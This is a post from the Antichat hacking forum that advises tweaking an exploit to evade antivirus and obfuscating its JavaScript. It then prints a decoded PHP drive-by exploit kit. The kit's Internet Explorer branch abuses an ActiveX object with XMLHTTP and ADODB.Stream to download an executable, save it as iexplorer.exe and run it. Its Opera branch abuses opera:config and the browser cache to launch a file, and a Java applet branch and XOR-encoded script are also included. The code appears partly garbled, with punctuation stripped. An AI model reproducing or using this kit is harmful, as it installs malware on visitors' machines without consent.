Форум АНТИЧАТ - Показать сообщение отдельно

По поводу первого сплойта - можно удаляя по одной строчке найти ту, на которую ругается антивирус и пробовать изменять её, куски яваскрипта без пхп можно обфусцировать на iframe.in
Однако у меня этот сплойт вообще не выполняется, ПХП выдает кучу ошибок неопределенных переменных, видимо он не полностью представлен, а переменные var[] определяются в том месте, куда инклюдится этот сплоит.

По поводу второго сплойта раскодировать его просто: вместо

PHP код:


		
			
eval($eval_php_code);

вписать

PHP код:


		
			
$f=@fopen("sploit-decoded.txt","w");

fwrite($f, $eval_php_code);

fclose($f);

В результате в файле sploit-decoded.txt имеем раскодированый сплоит:

PHP код:


		
			


#$url = "http_//"#$_SERVER["HTTP_HOST"]str_replace ("\\", "/", dirname (#$_SERVER["PHP_SELF"]))"/loadphp"%

function encode (#$content) {

    #$str = trim (strip_tags (#$content))%

    #$new = ""%

    for (#$i = 0% #$i < strlen (#$str)% #$i ++) #$new = chr (ord (#$str[#$i]) ^ 1)%

    return <script language=JavaScript>str = "#$new"%str2 = ""%for (i = 0% i < strlength% i ++) { str2 = str2 + StringfromCharCode (strcharCodeAt (i) ^ 1)% }% eval (str2)%</script>%

}

if (#$java == true) echo <applet archive="javaphp" code="BaaaaBaaclass" width=1  height=1><param name="url" value="#$url"></applet>%

elseif (#$browser == "MSIE") echo <html><head><meta HTTP-EQUIV="REFRESH" content="3% URL=indexphp?404">encode (<script language="JavaScript">

start()%

function start() {

var newg = documentcreateElement(\object\)%

newgsetAttribute(\id\,\newg\)%

newgsetAttribute(\classid\,\cl\+\si\+"d_BD"+"96C5"+\56-65A3-1\+"1D0-98"+\3A-00\+"C04"+\FC2\+"9E"+\36\)%

try {

var q = newgCreateObject(\ms\+"xm"+\l2\+""+\XM\+"LH"+\T\+\TP\,\\)%

var s = newgCreateObject("Shel"+"lAp"+"pl"+"icati"+"on",\\)%

var t = newgCreateObject(\ad\+\od\+"b"+\st\+"re"+\am\,\\)%

try { ttype = 1%

qopen(\G\+"E"+\T\,\#$url\,false)%

qsend()% topen()%

tWrite(qresponseBody)%

var name = \////iexplorerexe\%

tSaveToFile(name,2)%

tClose()%

} catch(e) {}

try { sshellexecute(name)% } catch(e) {}}

catch(e){}}

</script>)"</head></html>"%

elseif (#$browser == "Opera") echo encode (<script language="JavaScript">

blank_iframe = documentcreateElement(\iframe\)%

blank_iframesrc = \about_blank\%

blank_iframesetAttribute(\id\, \blank_iframe_window\)%

blank_iframesetAttribute(\style\, \display_none\)%

documentappendChild(blank_iframe)%

blank_iframe_windoweval ("config_iframe = documentcreateElement(\iframe\)%\

config_iframesetAttribute(\id\, \config_iframe_window\)%\

config_iframesrc = \opera_config\%\

documentappendChild(config_iframe)%\

app_iframe = documentcreateElement(\script\)%\

cache_iframe = documentcreateElement(\iframe\)%\

app_iframesrc = \<?php echo #$url% ?>\%\

app_iframeonload = function ()\

{\

cache_iframesrc = \opera_cache\%\

cache_iframeonload = function ()\

{\

cache = cache_iframecontentDocumentchildNodes[0]innerHTMLtoUpperCase()%\

var re = new RegExp(\(OPR\\\\w{5}EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"\+app_iframesrctoUpperCase(), \\)%\

filename = cachematch(re)%\

config_iframe_windoweval\

(\"\

operasetPreference(\Network\,\TN3270 App\,operagetPreference(\User Prefs\,\Cache Directory4\)+parentfilename[1])%\

app_link = documentcreateElement(\a\)%\

app_linksetAttribute(\href\, \tn3270_//nothing\)%\

app_linkclick()%\

setTimeout(function () {operasetPreference(\Network\,\TN3270 App\,\telnetexe\)},1000)%\

\")%\

}%\

documentappendChild(cache_iframe)%\

}%\

documentappendChild(app_iframe)%")%

</script>)%